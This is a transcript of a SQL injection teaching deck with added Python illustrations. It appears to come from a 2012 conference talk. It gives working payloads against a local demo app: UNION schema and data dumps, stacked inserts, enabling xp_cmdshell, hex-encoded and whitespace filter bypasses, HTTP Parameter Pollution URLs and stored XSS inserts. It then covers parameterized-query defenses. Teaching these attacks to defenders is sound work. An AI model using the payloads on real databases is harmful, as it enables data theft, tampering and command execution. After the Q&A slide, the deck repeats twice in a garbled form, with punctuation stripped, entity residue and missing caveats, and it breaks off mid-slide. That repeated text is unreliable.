TRANSCRIPT
abcd'; DROP TABLE PRESENTATIONS --
AKA SQL Injection: the fast, fun, and easy way to ruin someone's day
Columbus Code Camp 2012
Kevin Feasel, feaselkl@gmail.com
Understanding and Preventing SQL Injection
Who Am I?
• Database Administrator
  – Former web developer
  – SQL Server DBA
  – Currently working for Aetna
• Standard employer disclaimer
• Security Nut
• Cyclist
• Occasional world traveler
What Is SQL Injection?
• Injecting code in a manner the application developers did not expect
  – Example: your text box populates @Parameter to do a lookup on a table. Bad guy overloads @Parameter to perform some unexpected operation.
Why Should I Care?
• Not everyone is as nice as Good Guy Greg
• By 2006, web application vulnerabilities had become more popular than buffer overflows (http://cwe.mitre.org/documents/vuln-trends/index.html)
  – Cross-site scripting #1, SQL Injection #2
• SQL Injection now #1 (https://www.owasp.org/index.php/Top_10_2010-Main)
• Imperva (2011): 83% of successful data breaches involve SQLi
Companies Which Should Have Cared
Has Sony Been Hacked This Week?
But I'm Just One Man. What Can I Do?
• As an attacker
  – Get schema information
  – Get protected data
  – Perform "administrative" tasks
    • Create bogus user accounts (including admins)
    • Create, drop, or alter tables or views
    • Delete, update, or insert data
  – Run arbitrary executable code
• As a defender
  – Protecting against SQL injection is stupid easy in ASP.NET
Jumping Right In
• Defense requires knowledge
  – To defend against SQL injection, we must know how to perform SQL injection
• Demo Setup
"If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle." – Sun Tzu, The Art of War
Danger, Will Robinson!
Need a reason to update your resume? Try putting this code on a production machine. Goofus would:
• Hack naked
• Exploit external sites
• Point out that résumé is spelled with e-acutes
Demo Time: Put On Your Safety Goggles
• Starting in SQL Server Management Studio
  – Treat this as your lab
• Open up SQL Profiler
  – Watch the actual queries as they pass through
• Get rolling with Demo 1
What Went Wrong?
• SQL injection works by getting 'outside' the parameter
• We weren't able to
• Lesson 1: can't inject static SQL directly
  – With a static statement and a bound parameter, the input only ever arrives as a value; the parser never sees it as code
• Dynamic SQL
  – Ad hoc query
  – T-SQL Dynamic SQL
Demo 2: Win Or You're Out Of The Family
• Try this again using dynamic SQL
• Survey says: Success!
• Lesson 2: Using unsecured dynamic SQL, we can successfully attack
• Now we're ready to look at practical applications
Anatomy of a SQL injection attack
• Basic SQL query looks like: "select [cols] from [table] where [filter] like '" + Filter + "'"
• SQL comment line: --
• Example of a potential attack: Filter = "boo' OR 1 = 1 --"
• Turns into: "select [cols] from [table] where [filter] like 'boo' OR 1 = 1 --'"
  – The attacker's quote closes the literal, OR 1 = 1 makes the predicate true for every row, and -- comments out the closing quote the application appends
The Naïve Developer
• Basic task: load a grid based upon filtering criteria entered into a text box
• Our naïve developer hits the Googles and finds out how to use a SqlDataReader
• The code works; searches are successful
  – Even checks the filter to make sure a value exists
Having Fun With The Naïve Developer
• f' OR 1 = 1--
  – Bypass the filter; list all records
• Not fun enough? Gimme more!
• SHOOOO' UNION select TABLE_SCHEMA + '.' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--
  – Pick a name which doesn't exist; now we have a list of tables (three columns, to match the grid's Name, IsActive, and SortOrder)
• SHOOOO' UNION select COLUMN_NAME + ' ' + DATA_TYPE, case when IS_NULLABLE = 'NO' then 0 else 1 end, ORDINAL_POSITION from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'ProductSubcategory' and TABLE_SCHEMA = 'Production'--
  – Recon on a particular table
• SHOOOO' UNION select Name, ProductSubcategoryID, ProductCategoryID from Production.ProductSubcategory--
  – Looking at the actual data in that table
Having Fun With The Naïve Developer
• SHOOOO'; insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, 'Evil Hacker Subcategory', newid(), current_timestamp)--
  – Boom. Exploit complete.
• nada'; exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure;--
  – Turn on xp_cmdshell, letting us run external apps (only works if the web application's login has sysadmin-level rights, which is why the recap says to use limited-access accounts)
Our Developer's Response
• Users mention this "evil hacker subcategory"; developer investigates
• More internet searching; dev learns about blacklisting and creates a filter for his filter
  – No more of this "select" and "insert" rubbish
In Retrospect…
• Problem: the little old ladies using our program just got scared because they looked for the "Selected" subcategory
Back To The Drawing Board
• Need a slightly less naïve approach to filtering
• Our developer has a stroke of genius: evil hackers need to use "select" + space, whereas our little old ladies would use "select" without a space. We now have a separating equilibrium!
• Problem: you're doing it wrong
• Proof: SHOOOO' UNION select<tab>TABLE_SCHEMA + '.' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--
  – Yeah, <tab> is a tab (hex 09). Other valid separators: 0A, 0B, 0C, 0D, A0
150 Copy-Pastes Later…
• After adding various permutations of SQL commands + separators…
• declare @shmoo varchar(8000); set @shmoo = CAST(0x73656C656374095441424C455F534348454D41202B20272E27202B205441424C455F4E414D45206173204E616D652C20312061732049734163746976652C203120617320536F72744F726465722066726F6D20494E464F524D4154494F4E5F534348454D412E5441424C4553 as varchar(8000)); exec(@shmoo)
  – The filter sees only hex digits plus declare/set/exec; no keyword-and-separator pair ever appears in the input
Translating The Varbinary
• select cast('select TABLE_SCHEMA + ''.'' + TABLE_NAME as Name, 1 as IsActive, 1 as SortOrder from INFORMATION_SCHEMA.TABLES' as varbinary(8000))
  – Run this in SSMS to produce the 0x... literal for any statement you want to smuggle in
• Important note: this won't combine data together
  – exec(@shmoo) runs as its own batch, so its rows come back as a separate result set rather than being UNIONed into the grid
  – Varbinary runs are better for insert/update/delete operations
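The hex literal on the previous slide, decoded, together with the attacker-side encoding step that the CAST(... as varbinary(8000)) query performs. This is an added Python example and not code from the deck: blacklist_allows is a model of the developer's keyword-plus-space filter as the slides describe it, the separator list is the one the "Back To The Drawing Board" slide gives, and injected_search_text is an assumed way of wrapping the payload in a search-box value.

```python
from typing import Optional

# Hex digits of the 0x literal from the "150 Copy-Pastes Later" slide,
# split at token boundaries so the encoding is visible.
SLIDE_HEX = (
    "73656C656374"                                    # select
    "09"                                              # tab, not a space
    "5441424C455F534348454D41" "202B20"               # TABLE_SCHEMA +
    "272E27" "202B20"                                 # '.' +
    "5441424C455F4E414D45" "20617320" "4E616D65"      # TABLE_NAME as Name
    "2C20" "31" "20617320" "4973416374697665"         # , 1 as IsActive
    "2C2031" "20617320" "536F72744F72646572"          # , 1 as SortOrder
    "2066726F6D20"                                    # from
    "494E464F524D4154494F4E5F534348454D41" "2E" "5441424C4553"  # INFORMATION_SCHEMA.TABLES
)

# Bytes the slide lists as valid token separators in T-SQL.
SEPARATORS = {
    0x09: "tab", 0x0A: "line feed", 0x0B: "vertical tab",
    0x0C: "form feed", 0x0D: "carriage return", 0xA0: "non-breaking space",
}


def blacklist_allows(text: str) -> bool:
    """The developer's second filter: reject 'select' or 'insert' only when
    a plain space follows the keyword; everything else passes."""
    lowered = text.lower()
    return "select " not in lowered and "insert " not in lowered


def decode_payload(hex_digits: str) -> str:
    """What exec(@shmoo) runs: CAST(0x... as varchar) is just the raw bytes."""
    return bytes.fromhex(hex_digits).decode("latin-1")


def encode_payload(statement: str) -> str:
    """Attacker side: the same 0x literal SELECT CAST('...' AS varbinary(8000)) prints."""
    return "0x" + statement.encode("latin-1").hex().upper()


def separator_after(statement: str, keyword: str = "select") -> Optional[str]:
    """Name the separator byte that follows the first occurrence of keyword."""
    idx = statement.lower().find(keyword)
    end = idx + len(keyword)
    if idx < 0 or end >= len(statement):
        return None
    return SEPARATORS.get(ord(statement[end]))


def injected_search_text(hex_digits: str) -> str:
    """Assumed search-box value: close the literal, run the decoded bytes,
    comment out the trailing quote the application appends."""
    return ("nada'; declare @shmoo varchar(8000); set @shmoo = CAST(0x" + hex_digits
            + " as varchar(8000)); exec(@shmoo)--")


def every_separator_bypasses() -> bool:
    """True when the filter misses select followed by each listed separator."""
    return all(blacklist_allows(f"x' union select{chr(b)}* from t--") for b in SEPARATORS)


if __name__ == "__main__":
    decoded = decode_payload(SLIDE_HEX)
    print(repr(decoded))
    print("separator after select:", separator_after(decoded))
    print("filter lets the hex version through:", blacklist_allows(injected_search_text(SLIDE_HEX)))
```

The decoded text is the same INFORMATION_SCHEMA.TABLES query from the UNION slides, with a tab after select; the filter would have passed it even without the hex wrapper, and with the wrapper there is no keyword in the input at all.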
Other Fun Stuff We Can Do
• select CAST('insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, ''<a href="http://www.google.com">Hacker Domain</a>'', newid(), current_timestamp)' as varbinary(8000))
  – Add in undesired links. Hint from Heloise: this looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
• select CAST('insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, ''<script type="text/javascript">alert(''''A'''')</script>'', newid(), current_timestamp)' as varbinary(8000))
Querystring Injection
• Helpful table to understand querystring injection

Hex Code   Character
09         Tab
20         Space
25         %
27         '
2B         +
2C         ,
2D         -
2E         .
3D         =
Querystring Injection
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=bike%2527%20or%201%3D1%2D%2D
  – Translates to "bike' or 1=1--"
• The way we did the Slightly Less Naïve Stop actually helps us here by preventing some querystring attacks: http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=bike%2527%20union%20select%20table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
  – That "select%20" is equivalent to "select " (keyword plus space), which the filter catches
Querystring Injection
• Injecting other whitespace characters is as easy as %09… or %0A…
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=prevention%2527%20union%20select%09table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
HTTP Parameter Pollution
• In ASP.NET, including a parameter multiple times causes the different entries to be concatenated and separated by commas
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=36&search=jump&search=street
  – Turns into "36,jump,street" in our search
• This can be used for evil
  – Any guesses how?
HTTP Parameter Pollution
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=prevention%2527%20union%20select%2F%2A&search=%2A%2F%20table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
  – %2F%2A = /* and %2A%2F = */
  – Translates to "select/*,*/ table_schema…": the comma ASP.NET inserts between the two values is swallowed by the comment, and "select" is followed by "/" rather than a space, so the filter never fires
HTTP Parameter Pollution
• HTTP Parameter Pollution is something most people don't even think about
  – It doesn't help that different platforms react in different ways: concatenate, ignore all but the last, etc.
Effects On Different Platforms
https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
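How the querystring and HTTP Parameter Pollution slides play out against the keyword-plus-space filter, as an added Python example rather than code from the deck. It models Request.QueryString the way the HPP slide describes it (one percent-decode per copy, copies joined with commas); because the slides' URLs carry the quote double-encoded as %2527 and still end up as a quote in the SQL, the workbench evidently decodes a second time, and that second decode is assumed here. The query strings are copied from the slides; naive_filter_allows and whitelist_allows are assumed models of the blacklist and of the recap's whitelist advice.

```python
import re
from urllib.parse import parse_qs, unquote

WORKBENCH = "http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?"  # from the slides


def naive_filter_allows(value: str) -> bool:
    """The 'slightly less naive' filter: blocks select/insert only when a plain space follows."""
    lowered = value.lower()
    return "select " not in lowered and "insert " not in lowered


def aspnet_query_value(query_string: str, key: str = "search") -> str:
    """Request.QueryString[key] as the HPP slide describes it: each copy of the
    key is percent-decoded and repeated copies are joined with commas."""
    return ",".join(parse_qs(query_string, keep_blank_values=True).get(key, []))


def value_as_seen_by_sql(query_string: str) -> str:
    """Assumed second decode, needed for %2527 to become a quote as the slides show."""
    return unquote(aspnet_query_value(query_string))


# Whitelist from the recap: a search term is letters, digits and spaces, bounded in length.
SEARCH_TERM = re.compile(r"[A-Za-z0-9 ]{1,50}")


def whitelist_allows(value: str) -> bool:
    return SEARCH_TERM.fullmatch(value) is not None


# Query strings copied from the slides (the %2527, %20, %2B encoding is theirs).
SLIDE_QUERIES = {
    "or 1=1": "search=bike%2527%20or%201%3D1%2D%2D",
    "union with space": "search=bike%2527%20union%20select%20table_schema%2B%27%2E%27%2BTABLE_NAME"
                        "%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D",
    "union with tab": "search=prevention%2527%20union%20select%09table_schema%2B%27%2E%27%2BTABLE_NAME"
                      "%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D",
    "union via HPP": "search=prevention%2527%20union%20select%2F%2A&search=%2A%2F%20table_schema"
                     "%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D",
    "36 jump street": "search=36&search=jump&search=street",
}


def evaluate(query_string: str) -> tuple:
    """Return (text that reaches the SQL builder, whether the blacklist lets it through)."""
    seen = value_as_seen_by_sql(query_string)
    return seen, naive_filter_allows(seen)


if __name__ == "__main__":
    for label, qs in SLIDE_QUERIES.items():
        seen, allowed = evaluate(qs)
        print(f"{label:16} blacklist={'pass' if allowed else 'BLOCK':5} "
              f"whitelist={'pass' if whitelist_allows(seen) else 'BLOCK':5} {seen!r}")
```

Only the union-with-space URL trips the blacklist; the tab and the /*,*/ comment trick both pass. The whitelist rejects every one of them, including "36,jump,street", but it is a defense-in-depth check: the parameterized query is what actually removes the injection.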
Doing It Right: Parameterized Queries
• The right way to do it
  – All parameters created using SqlParameter
  – Not necessary to use stored procedures, though in SQL Server this is preferable
• Stored Procedure-Driven Test: not susceptible to SQL injection. You are safe from this issue, as long as the procedure itself doesn't build dynamic SQL from its parameters (the next slides cover that case)
• Secure Query-Driven Test: not susceptible either
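The concatenated lookup from the "Anatomy of a SQL injection attack" slide next to the parameterized lookup this slide recommends, as an added example that is not part of the deck. It uses Python's sqlite3 as a stand-in for SQL Server and SqlParameter (an assumption: the concatenation bug and the fix are the same, but sqlite has no INFORMATION_SCHEMA, so sqlite_master plays the role of the schema tables, and sqlite3's execute() takes one statement at a time, so the stacked insert and xp_cmdshell steps are not reproduced). The table and rows are constructed for the example.

```python
import sqlite3

# Constructed sample data standing in for AdventureWorks' Production.ProductSubcategory.
SAMPLE_ROWS = [(1, "Mountain Bikes"), (1, "Road Bikes"), (2, "Helmets"), (3, "Bike Racks")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table ProductSubcategory ("
        " ProductSubcategoryID integer primary key,"
        " ProductCategoryID integer, Name text)"
    )
    conn.executemany(
        "insert into ProductSubcategory(ProductCategoryID, Name) values (?, ?)", SAMPLE_ROWS
    )
    return conn


def naive_lookup(conn: sqlite3.Connection, filter_text: str) -> list:
    """The naive developer's grid query: the text box is glued into the SQL,
    so a quote in the input ends the literal and the rest is parsed as code."""
    sql = "select Name from ProductSubcategory where Name like '" + filter_text + "'"
    return [row[0] for row in conn.execute(sql)]


def parameterized_lookup(conn: sqlite3.Connection, filter_text: str) -> list:
    """Static SQL with a bound parameter (SqlParameter in ASP.NET, ? here):
    the input travels as a value and is never parsed, so there is no way
    to get 'outside' the parameter."""
    sql = "select Name from ProductSubcategory where Name like ?"
    return [row[0] for row in conn.execute(sql, (filter_text,))]


# Payloads from the "Having Fun With The Naive Developer" slides, adapted to sqlite's catalog.
OR_1_EQ_1 = "f' OR 1 = 1--"
LIST_TABLES = "SHOOOO' UNION select name from sqlite_master--"

if __name__ == "__main__":
    db = make_db()
    for payload in ("Helmets", OR_1_EQ_1, LIST_TABLES):
        print(repr(payload))
        print("  naive         ->", naive_lookup(db, payload))
        print("  parameterized ->", parameterized_lookup(db, payload))
```

Against the concatenated query the first payload returns every row and the second lists the tables; against the parameterized query both return nothing, because the engine is looking for a subcategory literally named f' OR 1 = 1--.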
Adding Dynamic SQL Into The Mix
• Basic insecure dynamic SP:
create procedure BadProc
    @Filter nvarchar(500)
as
declare @sql varchar(250);
set @sql = 'select * from table where Name like ''' + @Filter + '''';
exec(@sql);
• The basic problem is the same as in the query-driven injection example: @Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
• Easy to perform attacks on unprotected dynamic stored procedures from SSMS
• exec BadProc @Filter = 'SHOOOO'' UNION select TABLE_SCHEMA + ''.'' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--'
• Parameterizing the call from ASP.NET does not help here: the SqlParameter delivers the value intact to BadProc, which then concatenates it. The fix has to be inside the procedure.
Protecting Your Dynamic SPs
• Use sp_executesql
  – Could also use a combo of QUOTENAME and REPLACE
• Include the parameter as a parameter inside the SQL to run
• Example:
declare @sql nvarchar(max);
set @sql = N'select ProductSubcategoryID, ProductCategoryID, Name from Production.ProductSubcategory where Name like @Filter';
exec sp_executesql @sql, N'@Filter varchar(200)', @Filter;
• Once you do this you are safe from injection through @Filter. sp_executesql can only parameterize values, so anything you still splice into @sql as text (table or column names, an ORDER BY clause) needs QUOTENAME or a whitelist.
Recap: What To Do
• Parameterize Your Queries
  – Use SqlParameter to handle input in ASP.NET
  – Use sp_executesql correctly when you do use dynamic SQL
• Understand your data domain
  – Correct data sizes (not too large)
  – Input field has correct length
  – Regular expressions for well-defined field types (e.g., phone number, Social Security Number)
• Blacklists usually don't work, but whitelists can
• Create limited-access accounts for web applications
• Constraints in UI, business objects, and database
  – Defense in depth
  – This isn't really a violation of DRY
  – If I can beat two of your three checks, the third could still stop me
Next Steps
• Automation
  – Havij (most popular, easy GUI)
  – Sqlmap (my favorite)
  – BSQL Hacker (blind SQL injection)
  – BBQSQL (Python-based blind SQL injection)
  – Fast-Track (Metasploit module)
  – Plenty more where this came from
• Really evil stuff
Q&A
Kevin Feasel, feaselkl@gmail.com
Who Am I
bull Database Administrator ndash Former web developer
ndash SQL Server DBA
ndash Currently working for Aetna bull Standard employer
disclaimer
bull Security Nut
bull Cyclist
bull Occasional world traveler
What Is SQL Injection
bull Injecting code in a manner the application developers did not expect
ndash Example your text box populates Parameter to do a lookup on a table Bad guy overloads Parameter to perform some unexpected operation
Why Should I Care
bull Not everyone is as nice as Good Guy Greg bull By 2006 web application vulnerabilities had
become more popular than buffer overflows httpcwemitreorgdocumentsvuln-trendsindexhtml ndash Cross-site scripting 1 SQL Injection 2
bull SQL Injection now 1 httpswwwowasporgindexphpTop_10_2010-Main
bull Imperva (2011) 83 of successful data breaches involve SQLi
Companies Which Should Have Cared
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
What Is SQL Injection
bull Injecting code in a manner the application developers did not expect
ndash Example your text box populates Parameter to do a lookup on a table Bad guy overloads Parameter to perform some unexpected operation
Why Should I Care
bull Not everyone is as nice as Good Guy Greg bull By 2006 web application vulnerabilities had
become more popular than buffer overflows httpcwemitreorgdocumentsvuln-trendsindexhtml ndash Cross-site scripting 1 SQL Injection 2
bull SQL Injection now 1 httpswwwowasporgindexphpTop_10_2010-Main
bull Imperva (2011) 83 of successful data breaches involve SQLi
Companies Which Should Have Cared
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
